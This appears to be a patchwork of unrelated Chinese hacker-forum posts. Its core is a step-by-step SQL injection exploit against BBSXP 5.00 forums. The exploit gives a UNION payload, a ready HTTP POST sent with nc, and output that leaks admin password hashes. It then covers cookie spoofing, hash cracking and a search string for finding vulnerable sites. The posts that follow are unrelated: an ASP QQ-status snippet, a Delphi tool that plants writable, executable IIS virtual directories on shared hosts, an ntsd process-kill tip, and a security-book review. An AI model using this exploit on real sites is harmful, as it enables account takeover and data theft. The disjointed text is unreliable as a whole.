過(guò)濾了”; ‘ -- \ vbcrlf”，還有”< > &”等，其實(shí)過(guò)濾的也算嚴(yán)密了，程序員也挺難的，過(guò)濾多了可能影響使用，少了又會(huì)出安全問題。過(guò)濾了這么多我們?cè)撊绾卫媚兀看蠹易匀幌氲搅瞬聹y(cè)，是一個(gè)可行的辦法，表的結(jié)構(gòu)也都知道了，也很容易猜的。不過(guò)我還是用個(gè)簡(jiǎn)單的辦法吧。

二．漏洞利用

還是用本人很熟悉的union查詢，對(duì)ACCESS和MSSQL都有效。構(gòu)造過(guò)程本人就不寫了，直接給大家看結(jié)果。
select top 500 * from forum where deltopic<>1 and
forumid=0 union all select top 1 1,1,[user].username as topic,forum.use
rname,content,forum.posttime,forum.postip,1,1,1,1,1,1,1,[user].userpass as lastname,lasttime,polltopic,clubconfig.adminpassword as pollresult,1 from [user],forum,clubconfig where [user].membercode=5 or forum.id=0 or clubconfig.adminpassword

=’abcd’ and lasttime>now()-1 order by lasttime Desc

其中有顏色部分是我們要輸入的searchxm的值，中間的每個(gè)字符HTMLEncode函數(shù)都沒有過(guò)濾到。至于這個(gè)語(yǔ)句的含義，就是讓union 前面的語(yǔ)句為假，因?yàn)閒orumid不可能為0，union后面只查詢出一條記錄，其中包含了管理員的用戶名和加密密碼，還有社區(qū)管理的加密密碼，懂SQL語(yǔ)句的朋友一看就明白了。其中數(shù)字1沒有意義，只是為了匹配字段的類型，保證union前后字段數(shù)目和類型一致就行了。這里可以任意構(gòu)造，有興趣的朋友可以構(gòu)造自己的查詢，我給出的只是一個(gè)參考。
構(gòu)造好了輸入語(yǔ)句，還要構(gòu)造提交。這時(shí)就要想到WSE這個(gè)經(jīng)典之作，如果有人認(rèn)為對(duì)HTTP協(xié)議已經(jīng)熟的可以自己寫提交字符串，我也應(yīng)該勸他省省體力和腦力。
[圖1]
[圖2]
構(gòu)造的提交如下：
POST /bbsxp/search.asp?menu=ok HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://localhost:8000/bbsxp/search.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE2)
Host: localhost:8000
Content-Length: 481
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: eremite=0; userpass=E80B5017098950FC58AAD83C8C14978E; username=admin; skins=1; ASPSESSIONIDSSRQSDTB=OGLJMADCECKAFKGCPCCHBKHO; onlinetime=2004%2D8%2D13+20%3A08%3A33; addmin=0

content=fsaf&search=author&searchxm=%20forumid%3D0+union+all+select+top+1+1%2C1%2C%5Buser%5D.username+as+topic%2Cforum.username%2Ccontent%2Cforum.posttime%2Cforum.postip%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C%5Buser%5D.userpass+as+lastname%2Clasttime%2Cpolltopic%2Cclubconfig.adminpassword+as+pollresult%2C1+from+%5Buser%5D%2Cforum%2Cclubconfig+where+%5Buser%5D.membercode%3D5+or+forum.id%3D0+or+clubconfig.adminpassword&searchxm2=topic&TimeLimit=&forumid=&submit1=%BF%AA%CA%BC%CB%D1%CB%F7

其中searchxm部分我自己寫了個(gè)HTML頁(yè)面，用WSE截獲就可以獲得編碼了。
這里有個(gè)地方需要注意，就是COOKIE中的username和userpass必須是自己真實(shí)的。

把上面的代碼保存到記事本中用nc提交
nc –vv host port<post.txt >a.txt
post.txt為提交信息，a.txt用來(lái)接受返回?cái)?shù)據(jù)。
返回如下信息:
…
…
<script>ShowForum("1","abcdef","","昨夜長(zhǎng)風(fēng)","1","1","1","1","21232F297A57A5A743894A0E4A801FC3","1","1","67BA892B516067544ED15DE74B3DD2DD","2004-7-15 18:45:45");</script>
…
…
返回信息中類似上面的結(jié)構(gòu)只有一條，其中abcdef為管理員用戶名，兩個(gè)32位長(zhǎng)字符串，前者為abcdef的加密密碼，后者為社區(qū)管理加密的密碼，用的都是MD5加密。
到這里我想大家已經(jīng)知道怎樣利用了。可以利用Cookie欺騙進(jìn)行前臺(tái)管理，這要用到IECookiesView,具體過(guò)程請(qǐng)看相關(guān)教程，在此不再贅述。如果大家有時(shí)間可以用MD5CrackV2.2.exe暴力破解后臺(tái)加密的密碼，這個(gè)工具確實(shí)很實(shí)用，8位數(shù)字密碼幾分鐘（我的機(jī)子）就可以破解了，所以10位數(shù)字和8為小寫字母都可以強(qiáng)破。
想找BBSXP論壇，可以在Google上輸入“Powered by BBSxp 5.00”，80%以上網(wǎng)站存在此漏洞。
三 .總結(jié)
本人由于書寫匆忙，文章有些地方可能需要理解，拙劣之處還請(qǐng)大家見涼，不足之處請(qǐng)指出。寫此文章只是給大家拋磚引玉，分享一下自己的經(jīng)驗(yàn)，也提醒大家尋找漏洞時(shí)要把握程序的結(jié)構(gòu)和流程，提醒作者寫程序時(shí)不因細(xì)小而忽略。其實(shí)漏洞修補(bǔ)很簡(jiǎn)單，只要searchxm部分不是用用戶輸入，而是程序設(shè)定就沒問題了，也沒必要改變HTMLEncode函數(shù)。
暑假閑著無(wú)事，順便把漏洞利用程序?qū)懥顺鰜?lái)，免的象上次一樣自己發(fā)現(xiàn)的漏洞讓別人幫忙寫程序。希望大家不用利用漏洞做破壞，一切后果自己負(fù)責(zé)。 <%
On Error Resume Next
Server.ScriptTimeOut=9999999
Function getHTTPPage(Path)
t = GetBody(Path)
getHTTPPage=BytesToBstr(t,"gb2312")
End function

Function GetBody(url)
on error resume next
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "Get", url, False, "", ""
.Send
GetBody = .ResponseBody
End With
Set Retrieval = Nothing
End Function

Function BytesToBstr(body,Cset)
dim objstream
set objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
Function Newstring(wstr,strng)
Newstring=Instr(lcase(wstr),lcase(strng))
if Newstring<=0 then Newstring=Len(wstr)
End Function
qq = "123456"
url="http://webpresence.qq.com/getonline?Type=1&"&qq&":"
wstr=getHTTPPage(url)
if wstr = "online[0]=0;" then
response.write "unonline"
else
response.write "online"

end if

%>

這是我網(wǎng)站中的部分代碼，我提取了其中部分，已經(jīng)算是完整的了。可以正常截取QQ在線離線信息。當(dāng)然你可以調(diào)整XMLHTTP.ReadyState，實(shí)時(shí)獲取數(shù)據(jù)。 很久，很久沒有和大家聊天了，很想大家的。見面先就給大家送個(gè)小禮吧。其實(shí)也不是什么好東西。

在研究和學(xué)習(xí)中進(jìn)步，沒有研究，沒有深入的去了解，就沒有進(jìn)步。認(rèn)真的學(xué)習(xí)態(tài)度+窮追不舍+十萬(wàn)個(gè)為什么。

得到的結(jié)果就是成就！

好了，屁話放了太多了。明白的人，不看上面的話都明白。不明白的人，看了也許永遠(yuǎn)也不會(huì)明白。


系統(tǒng)中有個(gè)VBS也可以實(shí)現(xiàn)這樣的功能的。不過(guò)我認(rèn)為，如果在臺(tái)虛擬主機(jī)中，存在多個(gè)網(wǎng)站的情況下。

建立虛擬目錄，也只能在第一個(gè)默認(rèn)的站點(diǎn)中。一般情況下虛擬主機(jī)默認(rèn)是關(guān)掉的。也就是你建好了，通過(guò)HTTP也不能訪問。

從MSDN中，我找到了一些相關(guān)的技術(shù)資料，寫了個(gè)小工具。可以建立在其它站點(diǎn)中。這里看來(lái)說(shuō)起來(lái)有點(diǎn)混亂。

我舉例給大家說(shuō)說(shuō)吧。

拿個(gè)虛擬主機(jī)的 Internet 信息服務(wù)中的列表給大家看看就明白了

+默認(rèn) web 站點(diǎn)(已停止)
+管理 web 站點(diǎn)(已停止)
+163.com
+263.com
+363.com

好，上面大家看到了，有三個(gè)站點(diǎn)是開放的。而前面那個(gè)默認(rèn)的已經(jīng)被關(guān)閉了。

這時(shí)，我們用VBS建立虛擬目錄，是建立在默認(rèn)的站點(diǎn)中，而站點(diǎn)被停止了，所以建立成功后，也不能訪問。

比如：我們?cè)趺茨茉?63.com這個(gè)站中，建立一個(gè)目錄，比如:VDIR,通過(guò)http://www.163.com/VDIR就可以訪問了呢？

通過(guò)查找資料，我得到了，在建立的時(shí)候，允許指定一個(gè)序號(hào)，比如：1..N

1 : 表示，在默認(rèn)的站點(diǎn)中，然后按著這個(gè)順序來(lái)，而363.com對(duì)應(yīng)的序號(hào)就是5.

明白了這個(gè)道理后，用程序來(lái)實(shí)現(xiàn)這個(gè)功能就比較簡(jiǎn)單了。當(dāng)然，你會(huì)說(shuō)，那么我想在263.com這個(gè)站中，建立。

但是我不知道，這個(gè)站對(duì)應(yīng)的序號(hào)是多少，對(duì)于這個(gè)問題，我們只能從序號(hào)3開始一直往下建立，(1,2對(duì)應(yīng)的是前面默認(rèn)的)

當(dāng)建立一個(gè)后，可以讀出他的配置信息，返回給大家。建一個(gè)后，你就明白是不是建立在你想要建的那個(gè)站中，如果不是。

也可以把他刪掉。再增加序號(hào)。：）（有沒有一個(gè)工具，可以在命令行下，實(shí)現(xiàn)把所有的主機(jī)站點(diǎn)信息，比如:名稱，對(duì)應(yīng)目錄之類的列出來(lái)?原理差不多，你看完代碼應(yīng)該會(huì)寫了）

以下是代碼:

program VDir;

{$APPTYPE CONSOLE}

uses
ActiveX,SysUtils,ComObj;
Var
VName,
VPath,
Vattrib : String;

CreateVpath : Boolean;
WebIndex : integer;

Procedure ShowHelp;
Begin
WriteLn('=========== VDir by CYFD! ============');
WriteLn('');
WriteLn('Useag:'+ParamStr(0)+' <-n:VName> <-p:VPath> <-i:WebIndex> <-c:CmdType> [-r:Vattrib]');
WriteLn('');
WriteLn('Sample:'+ParamStr(0)+' -n:yfd -p:c:\ -i:1 -c:1 -r:0,1,3');
WriteLn('');
WriteLn(' CmdType :');
WriteLn(' 1 : Create');
WriteLn(' 0 : Delete');
WriteLn(' Vattrib :');
WriteLn(' 0 : AccessScript');
WriteLn(' 1 : AccessRead');
WriteLn(' 2 : AccessWrite');
WriteLn(' 3 : AccessExecute');
WriteLn(' 4 : EnableDirBrowsing');
End;

Procedure ParseParam(Str : String);
var
tStr : String;
Begin
tStr := lowercase(Copy(Str,1,3));
if tStr='-n:' then
VName := Copy(Str,4,Length(Str));
if tStr='-p:' then
VPath := Copy(Str,4,Length(Str));
if tStr='-c:' then
CreateVpath := StrToIntDef(Copy(Str,4,Length(Str)),1) = 1;
if tStr='-r:' then
Vattrib := Copy(Str,4,Length(Str));
if tStr='-i:' then
WebIndex := StrToIntDef(Copy(Str,4,Length(Str)),1);

End;

Function GetStrForSpace(SourceStr :String ; JGZF:char ; Index:integer):String;
var
Pchar1 : pchar;
i , count : integer;
cStr : string;
begin
Count := 0;
Pchar1 := pchar(SourceStr);
cStr := '';
for i:=0 to length(Pchar1)-1 do begin
if pchar1[i] = JGZF then
begin
Count := Count + 1;
if Count = Index then begin
break;
end;
end
else if Count = Index -1 then cStr := cStr + pchar1[i];
end;
Result := cStr;
end;


procedure CreateVDir(Vdirpath:string);
var
WebSite, WebServer, WebRoot, VDir,Binds: Variant;
BindStr : String;
begin
Try
WebSite := CreateOleObject('IISNamespace');
WebSite := WebSite.GetObject('IIsWebService', 'localhost/w3svc');
WebServer := WebSite.GetObject('IIsWebServer', IntTostr(WebIndex));

// 這里的WebIndex就是你要建立的序號(hào).

WebRoot := WebServer.GetObject('IIsWebVirtualDir', 'Root');

if CreateVpath then Begin
VDir := WebRoot.Create('IIsWebVirtualDir', VName);
Vdir.AccessScript := pos(',0,',Vattrib) >0;
VDir.AccessRead := pos(',1,',Vattrib) >0;
VDir.AccessWrite := pos(',2,',Vattrib) >0;
VDir.AccessExecute := pos(',3,',Vattrib) >0;
VDir.EnableDirBrowsing := pos(',4,',Vattrib) >0;

// 以上幾行是為你建立的目錄設(shè)訪問權(quán)限。可寫，可讀，可執(zhí)行，可流覽...

VDir.Path :=VDirPath;
VDir.SetInfo;

Binds := WebServer.ServerBindings;
BindStr := Binds[0]+':';
WriteLn('');
WriteLn('Result :');
WriteLn('');
WriteLn('IP : '+ GetStrForSpace(BindStr,':',1));
WriteLn('Port : '+ GetStrForSpace(BindStr,':',2));
WriteLn('HostName : '+ GetStrForSpace(BindStr,':',3));
WriteLn('');
WriteLN('Path Is: ' + WebRoot.Path);
WriteLN('Index IS: ' + IntTostr(WebIndex));
WriteLn('Comment : ' + WebServer.ServerComment);

// 上面幾行就是得到站點(diǎn)的一些信息，IP，端口，主機(jī)名，路徑，等等..

WriteLn('');
WriteLn('Create success.');
End
Else Begin
WebRoot.Delete('IIsWebVirtualDir', VName);
Writeln('Delete Success.');
End;
Except
WriteLn('Fail.');
End;

end;

Var
i : integer;
begin

coinitialize(nil);
if ParamCount <4 then Begin
ShowHelp;
Exit;
End;

For i:=1 to ParamCount do
ParseParam(Paramstr(i));

if (ParamCount = 5) and (Vattrib ='') then Begin
ShowHelp;
Exit;
End;
Vattrib := ','+Vattrib+',';
CreateVDir(VPath);

{ TODO -oUser -cConsole Main : Insert code here }

end.


代碼可以用COPY到記事本中，然后保存為VDIR.DPR 文件，用DELPHI打開編譯一下就行了。

使用方法:

我要在默認(rèn)站點(diǎn)(序號(hào)為1)中建立一個(gè)，可讀，可寫，可注瀏覽的目錄，名稱為: yfd 路徑為c:\

那么這么使用:

D:\VDir.exe -n:yfd -p:c:\ -i:1 -c:1 -r:1,2,4


程序幫助顯示:

Useag:VDir.exe <-n:VName> <-p:VPath> <-i:WebIndex> <-c:CmdType> [-r:Vattrib]

Sample:D:\VDir.exe -n:yfd -p:c:\ -i:1 -c:1 -r:0,1,3

CmdType :
1 : Create
0 : Delete
Vattrib :

0 : AccessScript (腳本訪問)
1 : AccessRead (可讀)
2 : AccessWrite (可寫)
3 : AccessExecute (可執(zhí)行)
4 : EnableDirBrowsing (可瀏覽)

-n: 建立的目錄名稱

-P: 建立的目錄路徑

-i: 序號(hào)

-c: (1表示建立,0表示刪除)

-r: (當(dāng)選擇建立的時(shí)候,請(qǐng)輸入他相應(yīng)的訪問權(quán)限值,刪除的時(shí)候可以不寫).



返回結(jié)果:

D:\>VDir.exe -n:yfd -p:c:\ -i:1 -c:1 -r:1,2,4

Result :

IP : 127.0.0.1
Port : 80
HostName :

Path Is: E:\Script\WEBTEST
Index IS: 1
Comment : 默認(rèn) Web 站點(diǎn)

Create success.


學(xué)習(xí)，努力學(xué)習(xí)！好好學(xué)習(xí)，認(rèn)真學(xué)習(xí)，我KAO，天天學(xué)習(xí)！
么才能關(guān)掉一個(gè)用任務(wù)管理器關(guān)不了的進(jìn)程？
我前段時(shí)間發(fā)現(xiàn)我的機(jī)子里多了一個(gè)進(jìn)程，只要開機(jī)就在，我用任務(wù)管理器卻怎么關(guān)也關(guān)不了

答:1.殺進(jìn)程很容易，隨便找個(gè)工具都行。比如IceSword。
關(guān)鍵是找到這個(gè)進(jìn)程的啟動(dòng)方式，不然下次重啟它又出來(lái)了。

順便教大家一招狠的。其實(shí)用Windows自帶的工具就能殺大部分進(jìn)程：
c:\>ntsd -c q -p PID

只有System、SMSS.EXE和CSRSS.EXE不能殺。
前兩個(gè)是純內(nèi)核態(tài)的，最后那個(gè)是Win32子系統(tǒng)，ntsd本身需要它。

ntsd從2000開始就是系統(tǒng)自帶的用戶態(tài)調(diào)試工具。被調(diào)試器附著(attach)的進(jìn)程會(huì)隨調(diào)試器一起退出，所以可以用來(lái)在命令行下終止進(jìn)程。使用ntsd自動(dòng)就獲得了debug權(quán)限，從而能殺掉大部分的進(jìn)程。

ntsd會(huì)新開一個(gè)調(diào)試窗口，本來(lái)在純命令行下無(wú)法控制，但如果只是簡(jiǎn)單的命令，比如退出(q)，用-c參數(shù)從命令行傳遞就行了。

NtsdNtsd 按照慣例也向軟件開發(fā)人員提供。只有系統(tǒng)開發(fā)人員使用此命令。有關(guān)詳細(xì)信息，請(qǐng)參閱 NTSD 中所附的幫助文件。



usage: ntsd [-?] [-2] [-d] [-g] [-G] [-myob] [-lines] [-n] [-o] [-s] [-v] [-w]
[-r BreakErrorLevel] [-t PrintErrorLevel]
[-hd] [-pd] [-pe] [-pt #] [-pv] [-x | -x{e|d|n|i} ]
[-- | -p pid | -pn name | command-line | -z CrashDmpFile]
[-zp CrashPageFile] [-premote transport] [-robp]
[-aDllName] [-c "command"] [-i ImagePath] [-y SymbolsPath]
[-clines #] [-srcpath SourcePath] [-QR \\machine] [-wake ]
[-remote transporterver=name,portid] [-server transportortid]
[-ses] [-sfce] [-sicv] [-snul] [-noio] [-failinc] [-noshell]

where: -? displays this help text
command-line is the command to run under the debugger
-- is the same as -G -g -o -p -1 -d -pd
-aDllName sets the default extension DLL
-c executes the following debugger command
-clines number of lines of output history retrieved by a remote client
-failinc causes incomplete symbol and module loads to fail
-d sends all debugger output to kernel debugger via DbgPrint
-d cannot be used with debugger remoting
-d can only be used when the kernel debugger is enabled
-g ignores initial breakpoint in debuggee
-G ignores final breakpoint at process termination
-hd specifies that the debug heap should not be used
for created processes. This only works on Windows Whistler.
-o debugs all processes launched by debuggee
-p pid specifies the decimal process Id to attach to
-pd specifies that the debugger should automatically detach
-pe specifies that any attach should be to an existing debug port
-pn name specifies the name of the process to attach to
-pt # specifies the interrupt timeout
-pv specifies that any attach should be noninvasive
-r specifies the (0-3) error level to break on (SeeSetErrorLevel)
-robp allows breakpoints to be set in read-only memory
-t specifies the (0-3) error level to display (SeeSetErrorLevel)
-w specifies to debug 16 bit applications in a separate VDM
-x sets second-chance break on AV exceptions
-x{e|d|n|i} sets the break status for the specified event
-2 creates a separate console window for debuggee
-i ImagePath specifies the location of the executables that generated
the fault (see _NT_EXECUTABLE_IMAGE_PATH)
-lines requests that line number information be used if present
-myob ignores version mismatches in DBGHELP.DLL
-n enables verbose output from symbol handler
-noio disables all I/O for dedicated remoting servers
-noshell disables the .shell (!!) command
-QR <\\machine> queries for remote servers
-s disables lazy symbol loading
-ses enables strict symbol loading
-sfce fails critical errors encountered during file searching
-sicv ignores the CV record when symbol loading
-snul disables automatic symbol loading for unqualified names
-srcpath specifies the source search path
-v enables verbose output from debugger
-wake wakes up a sleeping debugger and exits
-y specifies the symbol search path (see _NT_SYMBOL_PATH)
-z specifies the name of a crash dump file to debug
-zp specifies the name of a page.dmp file
to use with a crash dump
-remote lets you connect to a debugger session started with -server
must be the first argument if present
transport: tcp | npipe | ssl | spipe | 1394 | com
name: machine name on which the debug server was created
portid: id of the port the debugger server was created on
for tcp use: port=
for npipe use: pipe=
for 1394 use: channel=
for com use: port=,baud=,
channel=
for ssl and spipe see the documentation
example: ... -remote npipeerver=yourmachine,pipe=foobar
-server creates a debugger session other people can connect to
must be the first argument if present
transport: tcp | npipe | ssl | spipe | 1394 | com
portid: id of the port remote users can connect to
for tcp use: port=
for npipe use: pipe=
for 1394 use: channel=
for com use: port=,baud=,
channel=
for ssl and spipe see the documentation
example: ... -server npipeipe=foobar
-premote transport specifies the process server to connect to
transport arguments are given as with remoting

Environment Variables:

_NT_SYMBOL_PATH=[Drive:][Path]
Specify symbol image path.

_NT_ALT_SYMBOL_PATH=[Drive:][Path]
Specify an alternate symbol image path.

_NT_DEBUGGER_EXTENSION_PATH=[Drive:][Path]
Specify a path which should be searched first for extensions dlls

_NT_EXECUTABLE_IMAGE_PATH=[Drive:][Path]
Specify executable image path.

_NT_SOURCE_PATH=[Drive:][Path]
Specify source file path.

_NT_DEBUG_LOG_FILE_OPEN=filename
If specified, all output will be written to this file from offset 0.

_NT_DEBUG_LOG_FILE_APPEND=filename
If specified, all output will be APPENDed to this file.

_NT_DEBUG_HISTORY_SIZE=size
Specifies the size of a server's output history in kilobytes

Control Keys:

Quit debugger
Break into Target
Force a break into debuggee (same as Ctrl-C)
Debug Current debugger
Toggle Verbose mode
Print version information
ntsd: exiting - press enter ---

用法:開個(gè)cmd.exe窗口，輸入：
ntsd -c q -p PID

把最后那個(gè)PID，改成你要終止的進(jìn)程的ID。

如果你不知道進(jìn)程的ID，任務(wù)管理器－》進(jìn)程選項(xiàng)卡－》查看－》選擇列－》
勾上"PID（進(jìn)程標(biāo)識(shí)符）"，然后就能看見了。

2.xp下還有兩個(gè)好東東
tasklist和tskill
tasklist能列出所有的進(jìn)程，和相應(yīng)的信息
tskill能查殺進(jìn)程le
語(yǔ)法很簡(jiǎn)單
tskill 程序名！！
關(guān)于黑客安全的書籍已經(jīng)為數(shù)不少了，能稱得上是經(jīng)典的作品卻不多。放眼看去，我認(rèn)為有三部作品最值得推薦。一本是《應(yīng)用密碼學(xué)》，這是一本真實(shí)系統(tǒng)地介紹了密碼學(xué)及該領(lǐng)域的全面參考書，內(nèi)容廣博、權(quán)威且實(shí)用。第二本是《黑客大曝光》，這是一本國(guó)內(nèi)外都十分暢銷的圖書，注重案例分析，探討攻防對(duì)策是最大的特色。以上兩書的作者在國(guó)外都享有盛譽(yù)，而第三本值得推薦的作品，也是這篇文章著重介紹的，就是這部署名為Anonymous（匿名，音譯為"安尼姆斯"）的《Maximum Security》（中文版《最高安全機(jī)密》），如今出版的是該書的第3版。該書第1版面世之初，就引起了不少的爭(zhēng)議。來(lái)自《Computer World》的Sharon Machlis 說(shuō)道"想要學(xué)習(xí)如何破壞服務(wù)器嗎？尋找生成病毒代碼的工具？在電腦空間中隱藏你的身份？想要成為黑客的人通常會(huì)求助于不公開的雜志或破譯者站點(diǎn)來(lái)獲得這些技巧和提示。但是現(xiàn)在一個(gè)主流的出版商有一本充滿這些建議的書。該書面向系統(tǒng)管理員，卻引發(fā)了另一輪的爭(zhēng)論，就是到底應(yīng)該向一般公眾宣傳多少安全信息。"Anonymous在美國(guó)曾經(jīng)是一位臭名昭著的黑客，80年代即開始嘗試?yán)镁W(wǎng)絡(luò)侵入金融系統(tǒng)，并親手導(dǎo)演了一系列震驚海內(nèi)外的金融案件。由于該案影響很大，書籍出版之時(shí)引起的爭(zhēng)議也如此之大，Anonymous也終于被政府禁止在其作品上署名。這是一部著名黑客現(xiàn)身說(shuō)法的作品，講述的是如何防范黑客。
　　然而，無(wú)可否認(rèn)的是，這是一本與眾不同的安全圖書。《最高安全機(jī)密》（第3版）跟前面所提到的那兩本書各有千秋，《應(yīng)用密碼學(xué)》的作者施奈爾不愧是一位暢銷書的作家，他的每本作品都曾獲大獎(jiǎng)，語(yǔ)言上追求完美，把復(fù)雜問題簡(jiǎn)單化、通俗化是他在寫作上的最大特點(diǎn)，《網(wǎng)絡(luò)信息安全的真相》可以看作是該書的續(xù)集；《黑客大曝光》則號(hào)稱是漏洞寶典，從攻擊者和防御者的不同角度系統(tǒng)闡述了計(jì)算機(jī)和網(wǎng)絡(luò)的入侵手段及相應(yīng)防御措施，目前發(fā)展到第2版--作者還寫了多本連枝的書，當(dāng)然都不如這本"正品"。《最高安全機(jī)密》一書的組織方式與普通的計(jì)算機(jī)書籍完全不同，使用的方法也與普通的計(jì)算機(jī)書籍迥然不同，后面我將與大家詳細(xì)探討。正是由于作者的特殊經(jīng)歷，使得《最高安全機(jī)密》一書從第1版開始即獲得了讀者的廣泛關(guān)注。人們對(duì)此書發(fā)表得更多的是正面的評(píng)價(jià)，來(lái)自《PC Computing》的Rich Schwerin盛譽(yù)此書是"任何系統(tǒng)管理員都需要的讀物。請(qǐng)運(yùn)用來(lái)自黑客的觀點(diǎn)、提示和技巧，縫起你系統(tǒng)的缺口。"Ben Elgin（ZDNet Whole Web Catalog）的評(píng)價(jià)似乎更能全面地代表讀者的評(píng)價(jià)，他認(rèn)為這本書"提供了一個(gè)非常全面的關(guān)于Internet黑客程序及技術(shù)的教程--它也喚醒了Web站點(diǎn)管理員。通過(guò)誠(chéng)實(shí)地評(píng)估眾多工具對(duì)特定的平臺(tái)及網(wǎng)絡(luò)配置的影響，Web站點(diǎn)管理員將能更好地認(rèn)識(shí)到如何去保護(hù)他們的網(wǎng)絡(luò)，以及怎樣確定安全缺口發(fā)生的時(shí)間和地點(diǎn)。"機(jī)械工業(yè)出版社曾經(jīng)引進(jìn)并組織出版了這本書的前兩版，一直被國(guó)內(nèi)行業(yè)人士奉為必讀之作，很多讀者成為該書擁躉，每版必讀。
　　跟其他泛泛而談的安全圖書不一樣的地方是，這本書從一個(gè)黑客的角度，著重于介紹攻擊和防范的兩面。《Library Journal》如此評(píng)價(jià)道，認(rèn)為該書"詳細(xì)地討論了Internet戰(zhàn)爭(zhēng)、編程語(yǔ)言、掃描程序、嗅探器、口令破譯程序、特洛伊木馬、平臺(tái)安全、遠(yuǎn)程攻擊、欺騙、防火墻、以及法律。它既是一本防御用書，也是一部攻擊用書。" 讀者也許不相信自己會(huì)是受害者，然而閱讀完全書以后人們就會(huì)發(fā)現(xiàn)，任何人都是潛在的受害者；你要么是麻煩制造者，要么就是麻煩的澄清者，在這樣的戰(zhàn)爭(zhēng)中你絕對(duì)不可能處于中立。從這個(gè)層面去看，我認(rèn)為這是一部"黑客兵法"，它教會(huì)你如何在這場(chǎng)"沒有硝煙的戰(zhàn)爭(zhēng)"中取得勝利。書中不僅講述了現(xiàn)今與安全問題有關(guān)的內(nèi)容，而且還講述了安全問題在未來(lái)的發(fā)展動(dòng)向，整本書所提供的"方法學(xué)"有著非常經(jīng)典和通用的含義。作者提到"由于經(jīng)驗(yàn)相對(duì)不足，可能會(huì)出現(xiàn)各種各樣的網(wǎng)絡(luò)安全問題。基于上述原因，本書將始終以提高讀者的安全經(jīng)驗(yàn)作為主要任務(wù)。"有意思的是，在閱讀這本書的過(guò)程中，我們經(jīng)常會(huì)發(fā)現(xiàn)作品中滲透著許多極具價(jià)值的經(jīng)驗(yàn)與總結(jié)，正應(yīng)驗(yàn)著某些現(xiàn)實(shí)的問題。
　　與普通計(jì)算機(jī)書籍相比，這是一本組織方式獨(dú)樹一幟的圖書，讀者的閱讀方法也會(huì)有所不同。《最高安全機(jī)密》（第3版）一書包含1000多個(gè)URL或Internet地址，事實(shí)上為用戶提供了一張關(guān)于Internet安全信息的在線藏寶圖。這些額外的信息使得讀者能夠及時(shí)地得到各種更新的信息，同時(shí)也是讀者進(jìn)一步提升的重要參考。此外，書中還提供了各種的Internet安全工具，鑒于此，《最高安全機(jī)密》擁有了許多同類書籍所不具備的優(yōu)點(diǎn)。一張地圖、一把鏟子、一本指南，構(gòu)成了絕佳的組合。當(dāng)然，還應(yīng)該有一位探險(xiǎn)家參與其中。一位探險(xiǎn)者Bob Bruen（Cipher-Newsletter of the IEEE Technical Committee on Security and Privacy）如此說(shuō)道"要確保你站點(diǎn)的安全（誰(shuí)不呢？），這本書將是非常值得購(gòu)買和閱讀的--它有著接近200頁(yè)的黑客工具信息。有足夠的理由購(gòu)買本書，除非你不想自己從事這項(xiàng)研究。"
　　從第I部分的導(dǎo)引開始，作者向讀者介紹了目前信息安全領(lǐng)域的發(fā)展情況，也指出了目前我們所面臨的問題及其原因。作者提出，企業(yè)應(yīng)用系統(tǒng)的安全性問題常常來(lái)自于四大源頭：網(wǎng)絡(luò)和主機(jī)的配置有誤；操作系統(tǒng)和應(yīng)用程序存在缺陷；廠商缺少質(zhì)量評(píng)價(jià)及回應(yīng)的有效手段；安全領(lǐng)域的人才奇缺。第II部分則講述了信息安全的基本理論，對(duì)于讀者如何從頭建立起一個(gè)安全的計(jì)算機(jī)環(huán)境，提供了可靠的認(rèn)識(shí)保障。
　　防護(hù)和攻擊是網(wǎng)絡(luò)安全中的一對(duì)矛盾，在安全的教育方面更是如此。作者有這樣的一個(gè)觀點(diǎn)，要想有效地進(jìn)行防護(hù)，就必須對(duì)攻擊的技術(shù)手段、工具有深入的了解；而想要攻擊成功，也必須深入了解目標(biāo)系統(tǒng)的防護(hù)手段、內(nèi)部結(jié)構(gòu)等。該書即是如此，目的不是讓讀者去加害于人，但要進(jìn)行有效防護(hù)，就必須了解攻擊手段，所以在書中作者對(duì)攻擊和防護(hù)的兩個(gè)方面都作出了詳細(xì)的探討。
　　讀者經(jīng)常會(huì)混淆"駭客（Hacker）"和"黑客（Cracker）"這兩個(gè)詞，在書中作者對(duì)兩者下了非常明確的定義。駭客（Hacker），指的是那些對(duì)任何計(jì)算機(jī)操作系統(tǒng)的深?yuàn)W的工作機(jī)理都非常感興趣的人，他們一般都是程序員。因此，駭客擁有操作系統(tǒng)和編程語(yǔ)言等方面豐富的知識(shí)，他們能夠發(fā)現(xiàn)系統(tǒng)中的漏洞以及出現(xiàn)這些漏洞的原因；駭客能夠不斷地追求更加深入的知識(shí)，與別人共享他們的發(fā)現(xiàn)，并且從來(lái)不會(huì)破壞數(shù)據(jù)。黑客（Cracker）是指懷有惡意企圖、入侵到遠(yuǎn)端計(jì)算機(jī)或者破壞遠(yuǎn)端系統(tǒng)完整性的人。黑客往往在未經(jīng)授權(quán)訪問的情況下破壞重要的數(shù)據(jù)、拒絕合法的用戶訪問，從而給目標(biāo)機(jī)器帶來(lái)各種安全問題。由于其行為的惡意性，黑客往往容易被發(fā)現(xiàn)。一言以蔽之，前者是"善人"，后者是"惡客"。
